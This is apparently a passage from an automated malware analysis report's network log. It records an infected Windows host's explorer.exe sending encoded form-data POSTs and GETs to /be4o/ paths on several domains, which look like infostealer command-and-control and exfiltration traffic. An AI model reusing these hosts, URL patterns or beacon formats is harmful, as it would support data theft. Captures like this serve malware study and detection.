                                                                                                                                                                                                                              Data Ascii: V7prqh8UxGxqeWY_zuAZ6ZPPO2NBT4vWMkJgIfsmJz3HxtQLlSrSzjl1y3fplDYKLj239zBw8-CdncyEzbjrNoHN111Q0M1Vj1FePgnVMkrrVfkVOoUFAglyTIYWU9zgBJRu27GIuxYyQNIEMvzRLcHxJEPu3nNJ2TppYGOGDzvDcFftMI~zVWNeTo9DIm4Otad77dQt9fQjxiSAwORTkuPEqyGszf6xY9AiGjrHxVpNF8WpQij
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.201741934 CET9892OUTData Raw: 53 6b 62 63 62 57 38 59 37 5a 74 77 39 76 53 50 56 68 63 65 6e 51 57 71 43 4c 37 47 63 63 6d 58 48 62 7a 36 4d 64 45 32 79 45 76 59 4d 30 75 5a 28 49 79 51 65 6d 33 32 35 67 5a 74 56 32 4a 4c 44 49 58 39 72 44 4e 4e 6c 75 77 47 28 68 4f 77 33 41
                                                                                                                                                                                                                              Data Ascii: SkbcbW8Y7Ztw9vSPVhcenQWqCL7GccmXHbz6MdE2yEvYM0uZ(IyQem325gZtV2JLDIX9rDNNluwG(hOw3AO-DX18Q4Nod2q8LqELmYllefKe5h7cWaph7_9VkWClaYk6itXfQyohhL(7~ift1tRZ6QYfhoRTQ-pQsFlaP8Em9mgIX7MpSPrxQky8zL(lwRdk~o30PcLEpn27atzSckDuNfgxlwckZg1pT6EKeadKmGtaSY9_nqJ
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.202091932 CET9894OUTData Raw: 34 5f 59 2d 4f 78 37 38 67 6a 52 6d 4d 6b 56 5f 52 62 6a 4c 6c 48 6e 33 46 30 6a 7a 71 72 58 6d 35 79 51 6b 62 34 52 6e 70 36 74 6c 46 35 46 71 34 48 62 71 65 49 78 6d 36 68 65 64 66 63 28 2d 7a 61 42 6f 4f 43 50 54 28 52 68 35 68 46 7e 37 6a 74
                                                                                                                                                                                                                              Data Ascii: 4_Y-Ox78gjRmMkV_RbjLlHn3F0jzqrXm5yQkb4Rnp6tlF5Fq4HbqeIxm6hedfc(-zaBoOCPT(Rh5hF~7jtb9~U(a6HBt~sn6BkhNaEiD~2EU8i84DJqewNhUJ737OSgB4pUa1eDMqmF1DwvoMOEgwjCMl_gt9DtU99MDX0rQqad9QzitGZpeBlhAXIqwR2nNRfkRMI(B63HsqYg2tN~vn7vqd6LMhvTF5TI7xCiVqLNMp-uy5ZB
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.353749990 CET10031INHTTP/1.1 405 Not Allowed
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:33 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 154
                                                                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_CbjudUiBjCW5Ca4At5kMqgpefCGUlUMhFy81qXT6n7567CytrZGaq0zum65/Z+hg0KTAtZmTvVBtpROPYlF2QA
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              31192.168.11.204981834.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.194776058 CET9891OUTGET /be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.noireimpactcollective.net
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:54:33.300225973 CET10030INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:33 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 275
                                                                                                                                                                                                                              ETag: "61ffb800-113"
                                                                                                                                                                                                                              Via: 1.1 google
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              32192.168.11.204982735.214.4.7080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.384748936 CET10132OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.ooo-club.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.ooo-club.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.ooo-club.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                              Data Raw: 68 34 38 48 6c 3d 66 50 6c 5a 5a 74 73 4c 61 48 35 52 6e 33 74 63 58 42 39 4b 34 62 63 37 41 74 4e 37 34 61 39 65 37 59 7e 62 31 77 4d 49 43 4b 43 61 66 71 75 56 67 58 6b 4d 6f 72 75 4e 53 31 70 43 76 65 58 4e 46 68 44 5a 50 6e 4d 38 6f 6f 78 63 6a 62 68 44 77 39 78 63 42 46 63 4b 50 32 58 74 59 6c 61 47 6f 46 58 62 56 65 64 4a 79 6a 51 49 75 54 52 64 52 49 44 32 71 4f 5a 39 72 6c 34 61 7a 74 28 62 32 76 32 58 6c 2d 6a 62 33 7a 32 7a 36 61 42 6f 6b 49 7e 51 73 6d 30 4d 51 4d 37 30 43 6b 54 61 61 31 4c 70 54 37 68 48 28 6b 41 4f 70 58 37 47 54 39 41 64 31 79 52 48 7e 61 67 67 6e 50 4c 54 48 4b 62 54 6f 51 50 6c 52 6b 62 42 66 50 61 4b 39 6c 63 71 38 78 56 37 68 36 45 34 59 68 70 63 77 5f 59 61 4b 53 36 44 6d 56 5a 35 4d 62 6c 78 43 77 50 6f 58 42 6a 6e 41 77 28 6f 38 6a 6b 6d 55 48 49 62 30 6f 37 36 79 5a 73 72 51 33 57 4e 79 59 72 44 36 38 6b 58 6a 69 42 75 50 6f 66 2d 4a 67 64 44 46 41 41 36 76 48 47 6f 50 4f 50 4e 32 4b 46 79 48 5a 55 4d 39 4b 42 46 43 47 35 57 58 4a 51 50 59 54 63 37 6b 4f 79 31 64 59 76 49 56 47 76 45 46 56 42 4a 6a 2d 4f 6f 43 6d 73 74 72 6e 57 4e 42 73 59 66 6d 4a 70 74 4b 69 61 77 43 33 42 38 45 33 58 76 45 44 6c 58 48 63 31 7a 45 6f 78 49 61 4b 4f 68 41 6e 55 49 51 59 4c 5a 69 79 39 31 59 74 32 50 4a 78 6b 52 51 32 6c 71 55 4c 51 61 6a 6f 4c 41 47 38 33 48 6e 48 73 73 75 54 72 57 56 65 48 65 43 51 30 2d 75 66 45 6b 35 39 62 42 73 31 77 6b 44 39 28 6d 6d 4f 57 5f 73 4f 44 58 61 47 49 58 39 4e 42 44 66 6f 71 48 41 78 54 4b 7a 45 4a 74 77 5f 65 35 38 6e 69 47 6b 6b 44 36 45 73 38 50 4d 67 6a 62 32 79 71 71 30 36 7a 6b 7e 74 50 63 62 62 77 62 37 66 58 57 39 58 45 78 45 4b 53 63 45 49 6b 72 28 56 62 5a 4b 48 39 61 6c 4d 7a 77 56 61 4b 63 77 4f 36 5f 62 31 31 51 7e 58 54 56 54 79 75 43 38 4a 73 48 62 6a 4b 4c 4f 4f 75 31 39 39 6f 53 35 6c 53 33 41 69 68 57 43 75 79 6f 55 66 65 45 6c 55 70 69 53 4a 48 53 4a 49 4f 4b 67 36 7a 39 71 52 4a 70 65 79 4c 63 54 73 52 65 6e 6f 4d 31 73 51 71 32 48 78 46 71 31 32 75 66 7e 43 74 43 53 4c 44 75 42 55 34 74 4a 47 54 34 30 67 52 47 65 56 37 4b 42 4d 75 6f 28 54 50 46 61 50 4d 37 43 4d 52 4a 64 56 54 57 61 79 77 71 70 55 38 79 4a 34 59 63 63 49 71 79 42 74 55 49 33 65 53 48 75 6b 7e 62 37 44 74 68 79 36 64 44 35 73 77 35 73 54 62 74 38 56 77 5a 36 31 49 68 6a 4f 6c 71 59 70 4c 6f 35 5a 77 6d 4d 68 33 63 36 73 52 74 55 63 44 35 48 55 72 50 75 5f 50 72 4d 44 46 38 32 47 42 6f 68 70 53 4c 32 41 6c 43 63 4a 37 37 35 68 46 30 31 4b 58 30 6c 6f 63 38 46 62 51 51 4b 5f 74 75 58 35 38 74 57 4e 37 52 47 4a 33 35 44 31 49 51 57 4e 5a 4e 69 43 34 59 4a 38 35 53 69 67 28 59 32 58 79 62 47 65 49 4c 57 78 56 4a 66 59 53 70 4e 75 79 79 36 6e 51 55 31 4a 42 62 73 70 37 46 50 7a 6c 77 74 4b 41 6b 50 47 66 62 70 65 6c 32 72 78 6b 61 68 6a 49 4f 68 6c 58 61 38 2d 7a 5f 64 79 31 33 65 49 44 4c 56 6e 43 6c 41 5f 76 69 32 59 30 59 28 67 63 45 58 77 71 46 6e 7a 64 57 4e 31 68 35 28 6a 59 70 6a 4d 39 57 67 75 6a 73 6e 66 74 72 28 71 62 76 66 39 30 54 63 50 7e 31 41 4c 42 65 37 45 49 36 78 35 47 34 77 37 4c 59 59 68 34 5a 6a 65 5a 52 44 78 38 35 35 51 47 51 52 57 37 76 6d 66 59 32 6a 33 4e 56 31 47 64 48 73 4c 7e 56 4d 64 35 58 59 4e 4a 63 44 33 72 75 5a 41 78 4e 78 52 79 48 72 4f 6c 37 69 79 33 44 28 6f 6f 61 78 72 52 76 30 6c 35 62 6c 37 55 69 41 32 42 4b 59 4d 4b 33 30 6a 58 46 30 53 78 48 6c 43 49 5f 75 31 6d 4a 39 42 77 36 38 5a 48 36 59 6c 6c 4a 56 70 39 38 4c 6f 4b 70 61 55 41 76 4f 66 62 4a 51 5f 64 65 4d 4a 6e 6c 6a 53 51 64 78 57 67 51 6f 58 57 64 46 71 6b 38 36 48 37 4e 73 72 4f 6d 67 54 7a 43 41 55 61 4c 38 37 57 44 61 37 33 76 5a 4c 69 6b 72 4e 41 63 4a 49 73 48 30 6e 56 47 56 67 37 4b 56 63 5a 49 4c 51 7e 77 5a 4d 66 32 79 31 48 39 71 67 4e 64 47 75 72 76 74 51 68 5f 4e 55 35 34 6b 75 70 43 43 4b 7a 35 36 65 4b 52 32 62 41 47 30 58 48 6d 79 6a 63 30 45 56 70 6d 35 75 46 6a 70 6c 57 45 6f 41 57 54 51 4a 51 36 32 64 56 69 5a 52 6c 4f 31 66 73 56 31 6e 7a 4d 71 63 47 53 45 59 65 75 43 31 55 51 4d 44 4f 62 37 6c 4b 75 62 58 73 4f 73 6e 54 4e 6d 38 31 7a 42 48 6f 59 58 67 7a 59 58 6c 66 32 59 4f 58 4d 43 66 7a 4b 71 63 61 72 77 64 39 4a 78 55 33 4a 79 52 67 56 68 74 62 4d 6b
                                                                                                                                                                                                                              Data Ascii: h48Hl=fPlZZtsLaH5Rn3tcXB9K4bc7AtN74a9e7Y~b1wMICKCafquVgXkMoruNS1pCveXNFhDZPnM8ooxcjbhDw9xcBFcKP2XtYlaGoFXbVedJyjQIuTRdRID2qOZ9rl4azt(b2v2Xl-jb3z2z6aBokI~Qsm0MQM70CkTaa1LpT7hH(kAOpX7GT9Ad1yRH~aggnPLTHKbToQPlRkbBfPaK9lcq8xV7h6E4Yhpcw_YaKS6DmVZ5MblxCwPoXBjnAw(o8jkmUHIb0o76yZsrQ3WNyYrD68kXjiBuPof-JgdDFAA6vHGoPOPN2KFyHZUM9KBFCG5WXJQPYTc7kOy1dYvIVGvEFVBJj-OoCmstrnWNBsYfmJptKiawC3B8E3XvEDlXHc1zEoxIaKOhAnUIQYLZiy91Yt2PJxkRQ2lqULQajoLAG83HnHssuTrWVeHeCQ0-ufEk59bBs1wkD9(mmOW_sODXaGIX9NBDfoqHAxTKzEJtw_e58niGkkD6Es8PMgjb2yqq06zk~tPcbbwb7fXW9XExEKScEIkr(VbZKH9alMzwVaKcwO6_b11Q~XTVTyuC8JsHbjKLOOu199oS5lS3AihWCuyoUfeElUpiSJHSJIOKg6z9qRJpeyLcTsRenoM1sQq2HxFq12uf~CtCSLDuBU4tJGT40gRGeV7KBMuo(TPFaPM7CMRJdVTWaywqpU8yJ4YccIqyBtUI3eSHuk~b7Dthy6dD5sw5sTbt8VwZ61IhjOlqYpLo5ZwmMh3c6sRtUcD5HUrPu_PrMDF82GBohpSL2AlCcJ775hF01KX0loc8FbQQK_tuX58tWN7RGJ35D1IQWNZNiC4YJ85Sig(Y2XybGeILWxVJfYSpNuyy6nQU1JBbsp7FPzlwtKAkPGfbpel2rxkahjIOhlXa8-z_dy13eIDLVnClA_vi2Y0Y(gcEXwqFnzdWN1h5(jYpjM9Wgujsnftr(qbvf90TcP~1ALBe7EI6x5G4w7LYYh4ZjeZRDx855QGQRW7vmfY2j3NV1GdHsL~VMd5XYNJcD3ruZAxNxRyHrOl7iy3D(ooaxrRv0l5bl7UiA2BKYMK30jXF0SxHlCI_u1mJ9Bw68ZH6YllJVp98LoKpaUAvOfbJQ_deMJnljSQdxWgQoXWdFqk86H7NsrOmgTzCAUaL87WDa73vZLikrNAcJIsH0nVGVg7KVcZILQ~wZMf2y1H9qgNdGurvtQh_NU54kupCCKz56eKR2bAG0XHmyjc0EVpm5uFjplWEoAWTQJQ62dViZRlO1fsV1nzMqcGSEYeuC1UQMDOb7lKubXsOsnTNm81zBHoYXgzYXlf2YOXMCfzKqcarwd9JxU3JyRgVhtbMkkEeMUk7m0iatgOLVHvj9i1TdPiD87(Bb0tRWp95HCmPenRWVDWT0Qr-cx9wyqylKLb3gwAq9Ox_ZEih7I8wCLFKfbcXwbxWNTO3wYbUQUmjjIrO0o81NL8ocy7oqNnBgTicVQCy5FWXQHL6ZN7iEEEZUVqKyB1gCBCCYZghlKKpS2~fwOs4dmOW2870oQz9kduXKK2duLa40U6oZF9ZXFTnzmSy7PPGFkyosSBxKusw2RvWdTA_x_CORurXgrGHL64xhf0w2jWi(0kcDu98hPR8M2X-cTzQzI2O7EZD~JE9CdwphKgTro~fr_DSb9Apznrfw5dsY4IlkXVGol39bJu4YC5eXkZ8IvJaFTi8jzjzxgVquU7ygl(kbKtBewNSKYjQ7s7WSJrE5Bj7eHylOfZBEJxPbWtksKSM4lU5VgiKQYu_WIUAHBEWizAzV5eMNUzBScTpzQuhn_vMWCeY5fzkauTT41S9GodcyPWz4vgEF-69j-5W1GFtgiE9fIyquaV9NpyaJP(fOnnVYLhnRfDW7nq9Ekg2eOOib4ng(YOXmXPoZjmbiec2mpH10h6bJ81BhmuStFMDoUXNdD4-nSRCzkUjUBnLPv7MrO7Uc7NOkrWKY_udVaOMsZCGDP0e37VP6ue0L9HncVYlTYSFJAD_dlEr8zS84eR-Wg37uL6NkkJoLNe1TG3659h7nhdOAMT4eEf5NTM5T1cWkuUQ7g7iy8mHOfEQbf1F5S8ahuLl094I~w8Ny1(YPvtqlTISy9dFAY9WuIh94xLUzbC0FxqXqsjf7kZgBhMp9j6lTT~yaKMBzlD0sHfugvJxUpH5CJA5(ar6OaHkBF(UY8C52E(UE385Jjx9UGq69UtEWOZ5qbk5ihWQz0JtqaVL0K1w4Lg_iU(ZVcaL2GkaglDnkYh5STBpLA2wNN(UjM6sT76dbb(vS97Rg9zG3hQ_zApgqVbKDaN4f45EIqaLwqF2Brqh~MafZJM1noFn0qp3ileVWvTg(anHvB49WGlay_B5OOcPT-x7bYE99psjDPYY53PqsllfGW2i2QCOsB3KBFK1ohqs5-7aaYvq9CVgx041o7ujuP4NKSJJ6AaJdam3ll0ZjNooTLDVhR3_izKRbhWfkvV1e5nGxN1Ukcj9VAos2iWSmoIltNS9(EFFlAj2ROf9U28hIw1dMXSUMphxA2yp6kBl3L7fAZtzYZddMRclEZXvrmz74DRptQ72GSTixJbwnYBCsdKjfzVRmzEWCmP2dPmSE43Ttfn5BoD3Djw8OMFw0Ph0UvDJ2v63i7yV7B1scffz2BZz1Iy-WaS6Rw44ydCMat4jsy2gx5o_gs1u3FEnuSmoFOAQHjQ2hIoNFYUSHCK2HM3U0HQrc5ppXxp3yVtnDU7MwP3P3tXhWGFErViprhsWNB3Sp7OK41RCSK79bCz1s2R5JjBXM4woJiajYVisyeY_l9q1LLhrMZMCpdwwlVAuxEaQFHzSgzgM7V82lr53qbr1Dpdl8bWq6Zl7tHxDLFOOZE07gRmgaCQtkXpnXH7S1rQAYg0TLZ6dWY1vhkwFWSKr(CXB3GeBXoZb40BcqCicjgQYElkO3_p6BWm-LQX_pcrplQHfeKGWNoLXPCmqlYQiwvdDMuLvEfEQg14wClexypfaZk2FzLpsCF~ogVdeZQL_ElX5(DAz9rbD4-~xuhfYaRQ-sVCtkqsPs3GXFOY_wxX0ZMqb2NUC9THzxlVOPTY92APJNURY~jtlLcK4IzMUp7VEwQpeSfcMHl62dYSsvUQOP3VO6DeE~TCOfikitLeXgQ4w8BLro3F9LTB4fe4Z482INJhmFT6VlL(ccqIKF06VwMvncX638nsy6zNJ2xCzIg~X3OXaA_IuXCf_FArLFGTW(ROYIptjhwS4V9DbkQCh8AnX22ELL1nFnK~2gLJ4IzxSlJeVD7Vp0AuH1jJzA5QcIKOcf-3VUR9VxasoIk(ux0dVrSTEsWcWd93BywIpCki6FUmsXYf9nmVWP20EYcRIfk(igEQ4M066jKRRbqpTWY0iaYQFDO8qmWlDDd1HeV906kHWAy3GqUKSpxxMTens93qLiAXej2f7yt~JjVng~lZqi8~OuQ2L74A0f_m3GhcIWFW7UOh2SlZjGVWP6OpIeCuL7bpBXe1a~pZP(PkDFuAG3i6PPwBxhxPZDXjHPUzZihibniwiWP0PWO6T6sSGDkYwOWyUyb1VF2zSfp1oXCRlbLX8oOzj2liFbTIdPqSoOBKoJW5w~clYcBRRlT7ux9KsNeJn8whPB-cwnhThsLTU9dqUNlltGiy-DonVmuPbROn2EmcuJltcxdD4XHOjmjXhRg9o2EB9lOGaWJCTc77WbDMQ(tRyOWNajOsiKgRnT9cYXcyN7kJt7lh7(BB-mbp8yBZR5qGBTuuBRnOfYziuWhcV0KehbBg9S0Ig7ApqH2I3YTlb1EIMSJ7GsohV6qOsbPIz(5qkeEmY5kwHV3GRdZ30tdk7wmXic7DBMV6ivN6_a5f0mL2sJZnH05ErmMOAttxvcurDgkCjJZxleiXVJ5r_X71DvGuoIx~QkP6r2P5oHqrTXXnSd-208Ps8xuPuuKQ7e7VitvdiZvAi17HjCAKzoimh6Izdqe9SqhYv5MA5gIEVanE2rR2P6TRJKkWR1n3Os6hmRlW9pHf-2hiU6C8JVUyik5nFAE1xTJrJtIKmIw4X4Kuf81jaN7q6
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.384826899 CET10140OUTData Raw: 6e 55 63 47 6c 72 6a 50 69 37 43 34 4a 77 6f 72 59 7e 76 58 37 72 30 46 67 63 6e 33 53 58 69 33 68 50 45 69 50 38 56 67 61 48 31 6c 77 50 50 74 51 4c 5a 4b 65 58 74 64 43 55 45 32 50 4c 75 69 6e 62 50 53 61 6c 4c 66 72 66 4d 52 48 79 44 68 57 58
                                                                                                                                                                                                                              Data Ascii: nUcGlrjPi7C4JworY~vX7r0Fgcn3SXi3hPEiP8VgaH1lwPPtQLZKeXtdCUE2PLuinbPSalLfrfMRHyDhWXySS7iw5ohm0odzWa61St-iLRxfPrg5cn2o0Y8dQwB2CgBx4CRyXPJqWrtA7VKhZPT455nNHuIeEYp~_7jHlr8mZaBcGxmUGeLgaND82(coah-yqNHk0cQBlK-MEV7cjdJZomixgxB4zrJKR~eo_XwhhrQgKvn57Va
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409672022 CET10140INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:43 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.ooo-club.com/be4o/
                                                                                                                                                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                              X-HTTPS-Enforce: 1
                                                                                                                                                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.409861088 CET10146OUTData Raw: 78 7a 49 58 4d 33 51 59 53 49 56 39 75 6e 33 70 5f 34 55 57 53 32 34 68 30 68 4c 44 2d 6b 6a 6a 2d 38 67 28 30 66 2d 6d 61 64 59 43 44 74 6e 46 59 6a 6e 39 38 43 4e 4c 4e 70 6f 5a 76 4f 4c 57 79 78 67 75 66 69 59 69 6c 58 44 58 66 58 72 72 74 62
                                                                                                                                                                                                                              Data Ascii: xzIXM3QYSIV9un3p_4UWS24h0hLD-kjj-8g(0f-madYCDtnFYjn98CNLNpoZvOLWyxgufiYilXDXfXrrtbxvgVeyeS0nCMy1bnvohINyJpQAXoaMsnElMjwPlNFG-~xLPyr0mGA6t2Gvo9HYwDhE_FVjnvsbjmGt5LZGoa4zhtnpUGXi0KIdhmdqlt0AoLVpvH4~nBGaX6xxLB3q9VmitB0vacwaFB-9NGDWeXdWzjkp_9g~sY2


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              33192.168.11.204982835.214.4.7080C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.410276890 CET10147OUTGET /be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0 HTTP/1.1
                                                                                                                                                                                                                              Host: www.ooo-club.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                                                                                              Data Ascii:
                                                                                                                                                                                                                              Feb 21, 2022 16:54:43.435308933 CET10148INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                              Date: Mon, 21 Feb 2022 15:54:43 GMT
                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                              Content-Length: 162
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Location: https://www.ooo-club.com/be4o/?h48Hl=QNRjHLgdDThc6A5oSB9Rp7ktW95Q4+1l/IbqwB8DOvHda+yG2lJr6+bTEkZVhYbPGXKX&GXqXh=YZ_XN0
                                                                                                                                                                                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                                                                                                                                                                                              X-HTTPS-Enforce: 1
                                                                                                                                                                                                                              X-Proxy-Cache-Info: DT:1
                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                              34192.168.11.204983154.154.44.3980C:\Windows\explorer.exe
                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                              Feb 21, 2022 16:55:02.299629927 CET10175OUTPOST /be4o/ HTTP/1.1
                                                                                                                                                                                                                              Host: www.mariachinuevozacatecas24-7.com
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Content-Length: 174831
                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                              Origin: http://www.mariachinuevozacatecas24-7.com
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Referer: http://www.mariachinuevozacatecas24-7.com/be4o/
                                                                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
